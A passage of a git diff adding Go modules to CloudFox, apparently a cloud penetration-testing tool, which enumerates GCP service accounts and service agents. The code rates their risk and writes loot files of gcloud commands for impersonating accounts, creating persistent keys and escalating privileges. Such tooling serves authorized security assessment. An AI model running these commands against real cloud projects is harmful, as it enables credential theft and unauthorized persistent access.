+ "..." + } + return sa +} + +// formatTime formats a timestamp for display +func formatTime(timestamp string) string { + // Timestamp is in RFC3339 format + // Truncate to just date and time + if len(timestamp) > 19 { + return timestamp[:19] + } + return timestamp +} diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go new file mode 100644 index 00000000..99fe28dc --- /dev/null +++ b/gcp/commands/serviceaccounts.go @@ -0,0 +1,815 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAccountsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + Aliases: []string{"sa", "sas", "service-accounts"}, + Short: "Enumerate GCP service accounts with security analysis", + Long: `Enumerate GCP service accounts with detailed security analysis. + +Features: +- Lists all service accounts with metadata +- Analyzes user-managed keys (age, expiration) +- Identifies default service accounts (Compute, App Engine, etc.) +- Detects disabled service accounts +- Flags service accounts without key rotation +- Shows service account roles and permissions +- Identifies cross-project service account bindings +- Generates exploitation commands for penetration testing`, + Run: runGCPServiceAccountsCommand, +} + +// ServiceAccountAnalysis extends ServiceAccountInfo with security analysis +type ServiceAccountAnalysis struct { + IAMService.ServiceAccountInfo + IsDefaultSA bool + DefaultSAType string // "compute", "appengine", "cloudbuild", etc. + OldestKeyAge int // Days + HasExpiredKeys bool + HasOldKeys bool // Keys older than 90 days + KeyAgeWarning string + RiskLevel string // HIGH, MEDIUM, LOW + RiskReasons []string + ImpersonationCmds []string + // Pentest: Impersonation analysis + ImpersonationInfo *IAMService.SAImpersonationInfo +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ServiceAccountsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ServiceAccounts []ServiceAccountAnalysis + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ServiceAccountsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAccountsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAccountsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &ServiceAccountsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ServiceAccounts: []ServiceAccountAnalysis{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, m.processProject) + + // Check results + if len(m.ServiceAccounts) == 0 { + logger.InfoM("No service accounts found", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + return + } + + // Count findings + withKeys := 0 + highRisk := 0 + defaultSAs := 0 + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + withKeys++ + } + if sa.RiskLevel == "HIGH" { + highRisk++ + } + if sa.IsDefaultSA { + defaultSAs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d service account(s) (%d with keys, %d high-risk, %d default)", + len(m.ServiceAccounts), withKeys, highRisk, defaultSAs), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service accounts in project: %s", projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Create service and fetch service accounts with impersonation analysis + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccountsWithImpersonation(projectID) + if err != nil { + // Fallback to basic enumeration if impersonation analysis fails + serviceAccounts, err = iamService.ServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating service accounts in project %s: %v", projectID, err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + return + } + } + + // Get impersonation info for each SA + impersonationMap := make(map[string]*IAMService.SAImpersonationInfo) + impersonationInfos, err := iamService.GetAllServiceAccountImpersonation(projectID) + if err == nil { + for i := range impersonationInfos { + impersonationMap[impersonationInfos[i].ServiceAccount] = &impersonationInfos[i] + } + } + + // Analyze each service account + var analyzedSAs []ServiceAccountAnalysis + for _, sa := range serviceAccounts { + analyzed := m.analyzeServiceAccount(sa, projectID) + // Attach impersonation info if available + if info, ok := impersonationMap[sa.Email]; ok { + analyzed.ImpersonationInfo = info + } + analyzedSAs = append(analyzedSAs, analyzed) + } + + // Thread-safe append + m.mu.Lock() + m.ServiceAccounts = append(m.ServiceAccounts, analyzedSAs...) + + // Generate loot for each service account + for _, sa := range analyzedSAs { + m.addServiceAccountToLoot(sa, projectID) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service account(s) in project %s", len(analyzedSAs), projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } +} + +// analyzeServiceAccount performs security analysis on a service account +func (m *ServiceAccountsModule) analyzeServiceAccount(sa IAMService.ServiceAccountInfo, projectID string) ServiceAccountAnalysis { + analyzed := ServiceAccountAnalysis{ + ServiceAccountInfo: sa, + RiskReasons: []string{}, + ImpersonationCmds: []string{}, + } + + // Check if it's a default service account + analyzed.IsDefaultSA, analyzed.DefaultSAType = isDefaultServiceAccount(sa.Email, projectID) + + // Analyze keys + if len(sa.Keys) > 0 { + now := time.Now() + oldestAge := 0 + + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + // Calculate key age + keyAge := int(now.Sub(key.ValidAfter).Hours() / 24) + if keyAge > oldestAge { + oldestAge = keyAge + } + + // Check for expired keys + if !key.ValidBefore.IsZero() && now.After(key.ValidBefore) { + analyzed.HasExpiredKeys = true + } + + // Check for old keys (> 90 days) + if keyAge > 90 { + analyzed.HasOldKeys = true + } + } + } + + analyzed.OldestKeyAge = oldestAge + if oldestAge > 365 { + analyzed.KeyAgeWarning = fmt.Sprintf("%d days (>1 year)", oldestAge) + } else if oldestAge > 90 { + analyzed.KeyAgeWarning = fmt.Sprintf("%d days (>90 days)", oldestAge) + } + } + + // Generate impersonation commands + analyzed.ImpersonationCmds = []string{ + fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), + fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), + } + + // Determine risk level + analyzed.RiskLevel, analyzed.RiskReasons = determineServiceAccountRisk(analyzed) + + return analyzed +} + +// isDefaultServiceAccount checks if a service account is a GCP default service account +func isDefaultServiceAccount(email, projectID string) (bool, string) { + // Compute Engine default service account + if strings.HasSuffix(email, "-compute@developer.gserviceaccount.com") { + return true, "Compute Engine" + } + + // App Engine default service account + if strings.HasSuffix(email, "@appspot.gserviceaccount.com") { + return true, "App Engine" + } + + // Cloud Build service account + if strings.Contains(email, "@cloudbuild.gserviceaccount.com") { + return true, "Cloud Build" + } + + // Cloud Functions service account (project-id@appspot.gserviceaccount.com) + if email == fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID) { + return true, "App Engine/Functions" + } + + // Dataflow service account + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + // This is also used by Dataflow + return true, "Compute/Dataflow" + } + + // Cloud Run service account (uses compute default) + // GKE service account + if strings.Contains(email, "@container-engine-robot.iam.gserviceaccount.com") { + return true, "GKE" + } + + // Cloud SQL service account + if strings.Contains(email, "@gcp-sa-cloud-sql.iam.gserviceaccount.com") { + return true, "Cloud SQL" + } + + // Pub/Sub service account + if strings.Contains(email, "@gcp-sa-pubsub.iam.gserviceaccount.com") { + return true, "Pub/Sub" + } + + // Firebase service accounts + if strings.Contains(email, "@firebase.iam.gserviceaccount.com") { + return true, "Firebase" + } + + // Google APIs service account + if strings.Contains(email, "@cloudservices.gserviceaccount.com") { + return true, "Google APIs" + } + + return false, "" +} + +// determineServiceAccountRisk determines the risk level of a service account +func determineServiceAccountRisk(sa ServiceAccountAnalysis) (string, []string) { + var reasons []string + score := 0 + + // High-risk indicators + if sa.HasKeys && sa.OldestKeyAge > 365 { + reasons = append(reasons, "Key older than 1 year without rotation") + score += 3 + } else if sa.HasKeys && sa.OldestKeyAge > 90 { + reasons = append(reasons, "Key older than 90 days") + score += 2 + } + + if sa.HasExpiredKeys { + reasons = append(reasons, "Has expired keys (cleanup needed)") + score += 1 + } + + if sa.HasKeys && sa.KeyCount > 2 { + reasons = append(reasons, fmt.Sprintf("Multiple user-managed keys (%d)", sa.KeyCount)) + score += 1 + } + + if sa.IsDefaultSA && sa.HasKeys { + reasons = append(reasons, fmt.Sprintf("Default SA (%s) with user-managed keys", sa.DefaultSAType)) + score += 2 + } + + if sa.Disabled && sa.HasKeys { + reasons = append(reasons, "Disabled SA with active keys") + score += 2 + } + + // Determine risk level + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + + return "INFO", reasons +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAccountsModule) initializeLootFiles() { + m.LootMap["sa-impersonation-commands"] = &internal.LootFile{ + Name: "sa-impersonation-commands", + Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["sa-key-creation-commands"] = &internal.LootFile{ + Name: "sa-key-creation-commands", + Contents: "# Service Account Key Creation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["sa-high-risk"] = &internal.LootFile{ + Name: "sa-high-risk", + Contents: "# High-Risk Service Accounts\n# Generated by CloudFox\n\n", + } + m.LootMap["sa-old-keys"] = &internal.LootFile{ + Name: "sa-old-keys", + Contents: "# Service Accounts with Old Keys (>90 days)\n# Generated by CloudFox\n# Consider rotating these keys\n\n", + } + m.LootMap["sa-default-accounts"] = &internal.LootFile{ + Name: "sa-default-accounts", + Contents: "# Default Service Accounts\n# Generated by CloudFox\n# These often have broad permissions\n\n", + } + m.LootMap["sa-all-emails"] = &internal.LootFile{ + Name: "sa-all-emails", + Contents: "", + } + // Pentest: Impersonation-specific loot + m.LootMap["sa-impersonatable"] = &internal.LootFile{ + Name: "sa-impersonatable", + Contents: "# Service Accounts That Can Be Impersonated\n# Generated by CloudFox\n# These SAs have principals who can impersonate them\n\n", + } + m.LootMap["sa-token-creators"] = &internal.LootFile{ + Name: "sa-token-creators", + Contents: "# Principals Who Can Create Access Tokens (Impersonate)\n# Generated by CloudFox\n# Permission: iam.serviceAccounts.getAccessToken\n\n", + } + m.LootMap["sa-key-creators"] = &internal.LootFile{ + Name: "sa-key-creators", + Contents: "# Principals Who Can Create SA Keys (Persistent Access)\n# Generated by CloudFox\n# Permission: iam.serviceAccountKeys.create\n\n", + } + m.LootMap["sa-privesc-commands"] = &internal.LootFile{ + Name: "sa-privesc-commands", + Contents: "# Service Account Privilege Escalation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ServiceAccountsModule) addServiceAccountToLoot(sa ServiceAccountAnalysis, projectID string) { + // All service account emails + m.LootMap["sa-all-emails"].Contents += sa.Email + "\n" + + // Impersonation commands + m.LootMap["sa-impersonation-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n"+ + "gcloud auth print-identity-token --impersonate-service-account=%s\n\n", + sa.Email, + projectID, + sa.Email, + sa.Email, + ) + + // Key creation commands + m.LootMap["sa-key-creation-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s\n\n", + sa.Email, + strings.Split(sa.Email, "@")[0], + sa.Email, + projectID, + ) + + // High-risk service accounts + if sa.RiskLevel == "HIGH" { + m.LootMap["sa-high-risk"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n"+ + "# Risk Level: %s\n"+ + "# Reasons:\n", + sa.Email, + projectID, + sa.RiskLevel, + ) + for _, reason := range sa.RiskReasons { + m.LootMap["sa-high-risk"].Contents += fmt.Sprintf(" - %s\n", reason) + } + m.LootMap["sa-high-risk"].Contents += "\n" + } + + // Old keys + if sa.HasOldKeys { + m.LootMap["sa-old-keys"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n"+ + "# Oldest Key Age: %d days\n"+ + "# List keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", + sa.Email, + projectID, + sa.OldestKeyAge, + sa.Email, + projectID, + ) + } + + // Default service accounts + if sa.IsDefaultSA { + keysInfo := "No user-managed keys" + if sa.HasKeys { + keysInfo = fmt.Sprintf("%d user-managed key(s)", sa.KeyCount) + } + m.LootMap["sa-default-accounts"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Type: %s default\n"+ + "# Project: %s\n"+ + "# Keys: %s\n"+ + "# Get IAM policy:\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n\n", + sa.Email, + sa.DefaultSAType, + projectID, + keysInfo, + sa.Email, + projectID, + ) + } + + // Pentest: Impersonation loot + if sa.ImpersonationInfo != nil { + info := sa.ImpersonationInfo + + // SAs that can be impersonated + if len(info.TokenCreators) > 0 || len(info.KeyCreators) > 0 || len(info.SAAdmins) > 0 { + m.LootMap["sa-impersonatable"].Contents += fmt.Sprintf( + "## Service Account: %s\n"+ + "## Project: %s\n"+ + "## Risk Level: %s\n", + sa.Email, + projectID, + info.RiskLevel, + ) + if len(info.TokenCreators) > 0 { + m.LootMap["sa-impersonatable"].Contents += "# Token Creators (can impersonate):\n" + for _, tc := range info.TokenCreators { + m.LootMap["sa-impersonatable"].Contents += fmt.Sprintf(" - %s\n", tc) + } + } + if len(info.KeyCreators) > 0 { + m.LootMap["sa-impersonatable"].Contents += "# Key Creators (persistent access):\n" + for _, kc := range info.KeyCreators { + m.LootMap["sa-impersonatable"].Contents += fmt.Sprintf(" - %s\n", kc) + } + } + m.LootMap["sa-impersonatable"].Contents += "\n" + } + + // Token creators loot + if len(info.TokenCreators) > 0 { + for _, tc := range info.TokenCreators { + m.LootMap["sa-token-creators"].Contents += fmt.Sprintf( + "# %s can impersonate %s\n"+ + "# As %s, run:\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + tc, sa.Email, tc, sa.Email, + ) + } + } + + // Key creators loot + if len(info.KeyCreators) > 0 { + for _, kc := range info.KeyCreators { + m.LootMap["sa-key-creators"].Contents += fmt.Sprintf( + "# %s can create keys for %s\n"+ + "# As %s, run:\n"+ + "gcloud iam service-accounts keys create key.json --iam-account=%s\n\n", + kc, sa.Email, kc, sa.Email, + ) + } + } + + // Privesc commands + if info.RiskLevel == "CRITICAL" || info.RiskLevel == "HIGH" { + m.LootMap["sa-privesc-commands"].Contents += fmt.Sprintf( + "## Target SA: %s (Risk: %s)\n"+ + "## Project: %s\n", + sa.Email, + info.RiskLevel, + projectID, + ) + for _, reason := range info.RiskReasons { + m.LootMap["sa-privesc-commands"].Contents += fmt.Sprintf("# %s\n", reason) + } + m.LootMap["sa-privesc-commands"].Contents += fmt.Sprintf( + "\n# Step 1: Impersonate the SA\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n"+ + "# Step 2: Or create a persistent key\n"+ + "gcloud iam service-accounts keys create %s-key.json --iam-account=%s\n\n"+ + "# Step 3: Activate the key\n"+ + "gcloud auth activate-service-account --key-file=%s-key.json\n\n", + sa.Email, + strings.Split(sa.Email, "@")[0], + sa.Email, + strings.Split(sa.Email, "@")[0], + ) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main service accounts table + saHeader := []string{ + "Email", + "Display Name", + "Project", + "Disabled", + "Default SA", + "Keys", + "Key Age", + "Risk", + } + + var saBody [][]string + for _, sa := range m.ServiceAccounts { + disabled := "" + if sa.Disabled { + disabled = "YES" + } + + defaultSA := "" + if sa.IsDefaultSA { + defaultSA = sa.DefaultSAType + } + + keys := "-" + if sa.HasKeys { + keys = fmt.Sprintf("%d", sa.KeyCount) + } + + keyAge := "-" + if sa.OldestKeyAge > 0 { + keyAge = fmt.Sprintf("%dd", sa.OldestKeyAge) + } + + saBody = append(saBody, []string{ + sa.Email, + sa.DisplayName, + sa.ProjectID, + disabled, + defaultSA, + keys, + keyAge, + sa.RiskLevel, + }) + } + + // Service accounts with keys table + keysHeader := []string{ + "Service Account", + "Project", + "Key Count", + "Oldest Key Age", + "Has Old Keys", + "Has Expired", + "Risk", + } + + var keysBody [][]string + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + hasOld := "" + if sa.HasOldKeys { + hasOld = "YES" + } + hasExpired := "" + if sa.HasExpiredKeys { + hasExpired = "YES" + } + + keysBody = append(keysBody, []string{ + sa.Email, + sa.ProjectID, + fmt.Sprintf("%d", sa.KeyCount), + fmt.Sprintf("%d days", sa.OldestKeyAge), + hasOld, + hasExpired, + sa.RiskLevel, + }) + } + } + + // High-risk service accounts table + highRiskHeader := []string{ + "Service Account", + "Project", + "Risk Level", + "Risk Reasons", + } + + var highRiskBody [][]string + for _, sa := range m.ServiceAccounts { + if sa.RiskLevel == "HIGH" || sa.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + sa.Email, + sa.ProjectID, + sa.RiskLevel, + strings.Join(sa.RiskReasons, "; "), + }) + } + } + + // Default service accounts table + defaultHeader := []string{ + "Service Account", + "Project", + "Type", + "Has Keys", + "Disabled", + } + + var defaultBody [][]string + for _, sa := range m.ServiceAccounts { + if sa.IsDefaultSA { + hasKeys := "No" + if sa.HasKeys { + hasKeys = fmt.Sprintf("Yes (%d)", sa.KeyCount) + } + disabled := "No" + if sa.Disabled { + disabled = "Yes" + } + + defaultBody = append(defaultBody, []string{ + sa.Email, + sa.ProjectID, + sa.DefaultSAType, + hasKeys, + disabled, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "serviceaccounts", + Header: saHeader, + Body: saBody, + }, + } + + // Add keys table if there are any + if len(keysBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "serviceaccounts-keys", + Header: keysHeader, + Body: keysBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d service account(s) with user-managed keys", len(keysBody)), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Add high-risk table if there are any + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "serviceaccounts-high-risk", + Header: highRiskHeader, + Body: highRiskBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high/medium risk service account(s)", len(highRiskBody)), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Add default service accounts table if there are any + if len(defaultBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "serviceaccounts-default", + Header: defaultHeader, + Body: defaultBody, + }) + } + + // Pentest: Impersonation table + impersonationHeader := []string{ + "Service Account", + "Project", + "Token Creators", + "Key Creators", + "ActAs Users", + "Risk", + } + + var impersonationBody [][]string + impersonatableCount := 0 + for _, sa := range m.ServiceAccounts { + if sa.ImpersonationInfo != nil { + info := sa.ImpersonationInfo + if len(info.TokenCreators) > 0 || len(info.KeyCreators) > 0 || len(info.ActAsUsers) > 0 { + impersonatableCount++ + tokenCreators := "-" + if len(info.TokenCreators) > 0 { + tokenCreators = fmt.Sprintf("%d", len(info.TokenCreators)) + } + keyCreators := "-" + if len(info.KeyCreators) > 0 { + keyCreators = fmt.Sprintf("%d", len(info.KeyCreators)) + } + actAsUsers := "-" + if len(info.ActAsUsers) > 0 { + actAsUsers = fmt.Sprintf("%d", len(info.ActAsUsers)) + } + + impersonationBody = append(impersonationBody, []string{ + sa.Email, + sa.ProjectID, + tokenCreators, + keyCreators, + actAsUsers, + info.RiskLevel, + }) + } + } + } + + if len(impersonationBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "serviceaccounts-impersonation", + Header: impersonationHeader, + Body: impersonationBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) with impersonation risks", impersonatableCount), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + output := ServiceAccountsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go new file mode 100644 index 00000000..43698622 --- /dev/null +++ b/gcp/commands/serviceagents.go @@ -0,0 +1,326 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + serviceagentsservice "github.com/BishopFox/cloudfox/gcp/services/serviceAgentsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAgentsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Aliases: []string{"agents", "service-accounts-google", "gcp-agents"}, + Short: "Enumerate Google-managed service agents", + Long: `Enumerate Google-managed service agents and their permissions. + +Service agents are Google-managed service accounts that operate on behalf +of GCP services. Understanding them helps identify: +- Hidden access paths to resources +- Cross-project service agent access +- Overprivileged service agents +- Potential lateral movement via service agent impersonation + +Common Service Agents: +- Cloud Build Service Account (@cloudbuild.gserviceaccount.com) +- Compute Engine Service Agent (@compute-system.iam.gserviceaccount.com) +- GKE Service Agent (@container-engine-robot.iam.gserviceaccount.com) +- Cloud Run/Functions (@serverless-robot-prod.iam.gserviceaccount.com) +- Cloud SQL Service Agent (@gcp-sa-cloud-sql.iam.gserviceaccount.com) + +Security Considerations: +- Service agents often have broad permissions +- Cross-project agents indicate shared service access +- Cloud Build SA is a common privilege escalation vector +- Default compute SA often has Editor role`, + Run: runGCPServiceAgentsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ServiceAgentsModule struct { + gcpinternal.BaseGCPModule + + Agents []serviceagentsservice.ServiceAgentInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ServiceAgentsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAgentsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAgentsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEAGENTS_MODULE_NAME) + if err != nil { + return + } + + module := &ServiceAgentsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Agents: []serviceagentsservice.ServiceAgentInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) + + if len(m.Agents) == 0 { + logger.InfoM("No service agents found", globals.GCP_SERVICEAGENTS_MODULE_NAME) + return + } + + // Count cross-project and high-risk + crossProjectCount := 0 + highRiskCount := 0 + for _, agent := range m.Agents { + if agent.IsCrossProject { + crossProjectCount++ + } + if agent.RiskLevel == "HIGH" { + highRiskCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(m.Agents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) + if crossProjectCount > 0 { + logger.InfoM(fmt.Sprintf("[INFO] %d cross-project service agents detected", crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + if highRiskCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] %d high-risk service agents with elevated permissions!", highRiskCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service agents in project: %s", projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + svc := serviceagentsservice.New() + agents, err := svc.GetServiceAgents(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting service agents: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Agents = append(m.Agents, agents...) + + for _, agent := range agents { + m.addAgentToLoot(agent) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service agent(s) in project %s", len(agents), projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAgentsModule) initializeLootFiles() { + m.LootMap["service-agents-all"] = &internal.LootFile{ + Name: "service-agents-all", + Contents: "# Google-Managed Service Agents\n# Generated by CloudFox\n\n", + } + m.LootMap["service-agents-highrisk"] = &internal.LootFile{ + Name: "service-agents-highrisk", + Contents: "# High-Risk Service Agents\n# Generated by CloudFox\n# These service agents have elevated permissions\n\n", + } + m.LootMap["service-agents-crossproject"] = &internal.LootFile{ + Name: "service-agents-crossproject", + Contents: "# Cross-Project Service Agents\n# Generated by CloudFox\n# Service agents from other projects with access here\n\n", + } +} + +func (m *ServiceAgentsModule) addAgentToLoot(agent serviceagentsservice.ServiceAgentInfo) { + // All agents + m.LootMap["service-agents-all"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Email: %s\n"+ + "## Service: %s\n"+ + "## Description: %s\n"+ + "## Roles:\n", + agent.RiskLevel, agent.ServiceName, + agent.Email, agent.ServiceName, agent.Description, + ) + for _, role := range agent.Roles { + m.LootMap["service-agents-all"].Contents += fmt.Sprintf("## - %s\n", role) + } + m.LootMap["service-agents-all"].Contents += "\n" + + // High-risk agents + if agent.RiskLevel == "HIGH" || agent.RiskLevel == "MEDIUM" { + m.LootMap["service-agents-highrisk"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Email: %s\n"+ + "## Project: %s\n"+ + "## Roles: %s\n"+ + "## Risks:\n", + agent.RiskLevel, agent.ServiceName, + agent.Email, agent.ProjectID, + strings.Join(agent.Roles, ", "), + ) + for _, reason := range agent.RiskReasons { + m.LootMap["service-agents-highrisk"].Contents += fmt.Sprintf("## - %s\n", reason) + } + m.LootMap["service-agents-highrisk"].Contents += "\n" + } + + // Cross-project agents + if agent.IsCrossProject { + m.LootMap["service-agents-crossproject"].Contents += fmt.Sprintf( + "## [CROSS-PROJECT] %s\n"+ + "## Email: %s\n"+ + "## Has access to project: %s\n"+ + "## Roles: %s\n"+ + "## \n"+ + "## This service agent is from a DIFFERENT project but has access here.\n"+ + "## This could indicate shared services or potential lateral movement path.\n\n", + agent.ServiceName, agent.Email, agent.ProjectID, + strings.Join(agent.Roles, ", "), + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main agents table + header := []string{ + "Risk", + "Service", + "Email", + "Roles", + "Cross-Project", + "Project", + } + + var body [][]string + for _, agent := range m.Agents { + rolesDisplay := strings.Join(agent.Roles, ", ") + if len(rolesDisplay) > 50 { + rolesDisplay = rolesDisplay[:50] + "..." + } + + crossProject := "No" + if agent.IsCrossProject { + crossProject = "YES" + } + + // Shorten email for display + emailDisplay := agent.Email + if len(emailDisplay) > 40 { + parts := strings.Split(emailDisplay, "@") + if len(parts) == 2 { + emailDisplay = parts[0][:10] + "...@" + parts[1] + } + } + + body = append(body, []string{ + agent.RiskLevel, + agent.ServiceName, + emailDisplay, + rolesDisplay, + crossProject, + agent.ProjectID, + }) + } + + // By service summary + serviceCounts := make(map[string]int) + for _, agent := range m.Agents { + 